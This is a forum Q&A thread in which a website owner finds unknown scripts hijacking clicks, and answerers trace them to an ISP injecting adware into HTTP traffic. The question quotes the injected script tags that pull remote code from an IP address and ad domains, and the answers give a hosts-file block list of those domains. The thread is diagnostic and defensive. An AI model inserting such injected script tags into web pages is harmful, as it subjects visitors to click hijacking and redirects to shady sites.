unknown scripts are running and redirecting on click to unknown websties

Asked 27/6, 2018 at 14:7 Answered 11/1, 2022 at 5:59

Solved javascript jquery html css malware

Problem:- Sometimes, on clicking on NAVBAR menu or on any div on my bootstrap website, It redirects to ads or unknown links in new tab something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from hosted file:-

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

What I got in Inspection:-

I checked my code multiple times when there is no redirect on clicking menu..I found nothing suspicious... BUT THEN when I got redirect links on click, I checked my code in browser and I can clearly see few script sources added to my files( Can see in Inspection mode in browsers only).They are not Written to my code. Unknown parts of my code are..

1) HERE The following 2 scripts are replacing script js/jquery.min.js in head tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to body tag right after I imported google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) This one is also in body tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) On inspecting The redirect link. The HEADERS info:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:-

My code is clean and there is no script which is redirecting it to somewhere. It may be my browser or Windows being compromised .I checked website from 3 browsers EDGE, CHROME, FIREFOX .. got same problem. then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if server is compromised they replied its okay from their end... I installed malwarebytes and all softwares to solve it...but they just notify that chrome / firefox / Edge is redirecting to outbound ID with some domain name mostly go.oclasrv.com and do nothing.

ANY SOLUTION???

UPDATE:-

I got similar redirect on Hostgator support feedback link..

On noticing, Here the domain name in string is replaced by rateus.in zoneid=1492761 is same whatever unsecure link I open.. also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx is changed for different links and fingerprint=c2VwLW5vLXJlZGlyZWN0 is same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 pro and I have installed only Chrome without any plugins...

The problem is browser independent as I got same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

Displace answered 27/6, 2018 at 14:7 Comment(5)

Sounds like a virus or JS injection. Not much we can do about that. – Coveney 27/6, 2018 at 14:12

This may or may not help, but can you try serving your site over HTTPS? It would help determine where along the transport of your content the tampering is occuring. – Crapshooter 27/6, 2018 at 14:14

It happens due to BSNL injecting their AD scripts when the HTTP request is unsecured one. You can add IP Security policy on your local machine/domain systems following this post davidsekar.com/misc/block-bsnl-ads-using-ipsec – Evanevander 15/10, 2018 at 9:43

Similar complaints reported at reddit.com/r/india/comments/8wj6ec/… – Sholem 22/12, 2018 at 18:20

BSNL n/w is the real culprit.. – Auntie 14/12, 2020 at 14:50

This seems to be a case of ISP injecting JavaScript files. Are you by any chance on the BSNL broadband?. For last few days, BSNL seems to be injecting Adware on HTTP(non encrypted) sites.

The only solution I know is to host your site on https OR change your ISP.

Melmela answered 2/7, 2018 at 0:37 Comment(10)

Yes. This is happening on BSNL broadband and BSNL mobile. They are injecting Adware on HTTP traffic intercepting and pushing Javascript files. – Melmela 8/7, 2018 at 14:8

I am also using BSNL and this is happening across all my devices, desktop, mobile phones etc in non https sites. very poor way for an ISP to make money. I reached this page by searching BSNL and cobalten – Maccarone 8/7, 2018 at 16:14

The only solution is to raise a grievance request on BSNL portal letting them know that this is a really bad way. Some of the links are pointing to really shady websites. – Melmela 9/7, 2018 at 17:45

same issue here – Underclay 1/8, 2018 at 14:13

You can also block request to 117.240.205.115:3000 via your router till BSNL does not resolve this issue from their end. I done the same in my D-LINK router. But do report this issue via grievance and using twitter. – Dymoke 8/8, 2018 at 13:34

From this page quora.com/What-is-cobalten-com-redirect-virus If using chrome go to chrome://settings/content/javascript and under “Block” section add [*.]cobalten.com . This stopped the pop ups, on my BSNL broadband and mobile data. – Streaky 2/9, 2018 at 12:18

Is it BSNL or some bad BSNL employee? – Impute 11/10, 2018 at 6:35

It could well be a corrupt employee. I am seeing that sometimes it is even forwarding to very nasty websites. – Melmela 11/10, 2018 at 12:11

This is definitely coming from BSNL network only. And it affects (and can only affect) non-secure sites. Want to add - use HTTPs anyways because Google might end up flagging your website as bad - because of a script injected by BSNL. Setup Cloudflare and HTTPS redirects using Cloudflare – Margrettmarguerie 31/10, 2018 at 11:18

It is not necessarily your hosting. if you visit any website on any server, if the site is non https, your clicks are getting hijacked. does this mean that you don't browse any non-https site? – Prosser 13/11, 2018 at 19:0

This issue that you are having is server-side. Likely nothing is wrong with your code, however the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.

Impermanent answered 27/6, 2018 at 14:17 Comment(8)

currently I am on shared hosting plan on Hostgator... As its a static website, I can't afford dedicated serve for a static website.. I can add a SSL Certificate to domain but don't know if that will solve my problem.... Hostgator Support was pathetic for same.. Their words were "what you want me to do". – Displace 27/6, 2018 at 19:35

Also, Do protection add-on like Sitelock Malware Protector on hostgator, even work to prevent malware attacks???. OR, I am guessing they are intentionally infecting shared hosting to sell their add-ons...Any Better malware free shared host provider with best uptime for Canada region. – Displace 27/6, 2018 at 19:55

I would recommend making a backup of all of your code that you know is free from malware, then deleting all files on the server that you have access to. Then changing all passwords (make them complex), then add your files back. Did you try this? – Impermanent 27/6, 2018 at 19:56

That's the next step I will do.. BUT today When I contact and shared Hostgator the code and all ..They also said to change the passwords of al logins.. and when I got feedback window for hostgator support.. I got same redirect link when I clicked on ratings.. < script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761">< /script> I didn't even install anything else on my fresh Win10 system except chrome.. Even I got this problem on preinstalled EDGE before installing chrome.. Isn't it weird or anything wrong..?????? – Displace 28/6, 2018 at 13:19

Have you been able to test this on another computer? – Impermanent 30/6, 2018 at 1:20

I got exactly same issue on my website hosted on shared godaddy hosting – Undercroft 30/6, 2018 at 19:22

My blog is on wordpress, is it due to some plugin? – Undercroft 30/6, 2018 at 19:22

Seems like some new malware – Undercroft 30/6, 2018 at 19:23

If you see unknown script injected from following IPs, then it is the script file injected by BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security so it can not be tampered by ISP.

The script files from this IP is just a conduit, which downloads further AD scripts from different AD media. Most of this AD media follows intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop those.

Evanevander answered 24/10, 2018 at 2:50 Comment(0)

Good Catch!

BSNL servers have been corrupting or infecting with Malware / Virus day-by-day due to poor security

There was naganoadigei.com was registered explicitly to serve malware and redirect users to phishing sites.

Recently on February 2019, they had resolved the issue. But unfortunately the new type of ad based redirects found that was humparsi.com as of in the month February 2019

You may have a look at whether the site has been infected or not by visiting Sucuri

Alternatively, you can block the outgoing request by your standalone system in DNS entry

Navigate to %windir%\System32\drivers\etc and edit the hosts file in elevated mode / with Admin authorization and add these lines to your hosts file

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL

To Block specific IP address you do it by blocking outgoing bounds in the firewall

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing Add-ons such as NoScript or ScriptSafe and HTTPS Everywhere

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob

Col answered 11/4, 2019 at 12:19 Comment(8)

And now it's redirecting me via xalabazar.com – Yuki 24/5, 2019 at 5:21

Just protect your browser finger print. Will you provide me to on to which websites it's going to redirect via xalabazar.com. Is it from the broadband connection it's happening or not. I just need to confirm the same via BSNL SIM @UdayrajDeshmukh – Harpy 24/5, 2019 at 5:33

I've checked it on BSNL broadband connection. I believe it is happening on every http website at random intervals by clickjacking. Try on this link, you may need to reload and click a button for about 5 minutes to confirm – Yuki 25/5, 2019 at 7:24

Found the script with url : Be aware, before clicking this link since it would leads all your browsing information to this IP 117.254.84.212. It will not going to work on BSNL SIM data. – Harpy 25/5, 2019 at 10:4

Reason was Ping request could not find host xalabazar.com. Please check the name and try again. on the BSNL SIM data network only via BSNL Broadband @UdayrajDeshmukh – Harpy 25/5, 2019 at 10:4

Yes I know about that script from blog post shared in other answer here. I was just informing that they might be just changing the url from humparsi.com to xalabazar.com and now its preskalyn.com . – Yuki 25/5, 2019 at 11:4

Here you can see the screenshot Link1 and Link2. I have updated list of sites infected if you find anymore include by editing the post @UdayrajDeshmukh – Harpy 25/5, 2019 at 11:14

Here the script is being injected to /wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp you can find the getjs() routes via method loaded from the Node.js getjs Link getting our IP Address from the BSNL SIM / any other ISP @UdayrajDeshmukh – Harpy 25/5, 2019 at 11:52

Simply block the URL (bsnl IP injecting these ads) from your router's security section. For me bsnl URL was http://117.254.84.212

Arnhem answered 8/10, 2020 at 13:56 Comment(0)

Adguard has fixed this as referenced here to block the clickjacking. The script can be seen in action in Mobile Browsers, opening New Tab advertisements.

Update your Adguard Filters to latest version to see

Pungent answered 29/10, 2020 at 0:26 Comment(0)

Block this URL http://117.254.84.212:3000 seems more effective

In Router

Ifill answered 11/1, 2022 at 5:59 Comment(0)

Hot tags

Godot Unity Godot Help Programming Godot 4.X GUI GDScript 3D 2D Physics CSharp Godot 3.X VR XR Projects C++

Recommended topics

Hot tags